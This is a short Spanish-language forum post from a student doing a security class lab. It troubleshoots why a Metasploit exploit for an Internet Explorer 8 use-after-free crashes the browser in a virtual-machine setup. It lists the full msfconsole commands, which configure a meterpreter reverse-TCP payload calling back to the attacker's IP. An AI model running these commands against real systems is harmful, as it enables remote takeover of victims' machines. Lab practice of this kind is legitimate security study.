Debido a que tengo que realizar una práctica para la asignatura de seguridad me puse con el 0day recinte que salió para IE8.
Ejecutándolo todo bajo máquinas virtuales, la víctima sobre windows xp sp3 con IE8 y el atacante usando backtrack y metasploit; me da un error y cierra IE.
Metasploit queda en Sending HTML...
Error de IE:
Código:
AppName: iexplore.exe AppVer: 8.0.6001.18702 ModName: msvcrt.dll
ModVer: 7.0.2600.5512 Offset: 00035ee2
PD:
Código usado en msfconsole:
Código:
use exploit/windows/browser/ie_cdwnbindinfo_uaf
set SRVHOST ip_del_atacante
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST ip_del_atacante
exploit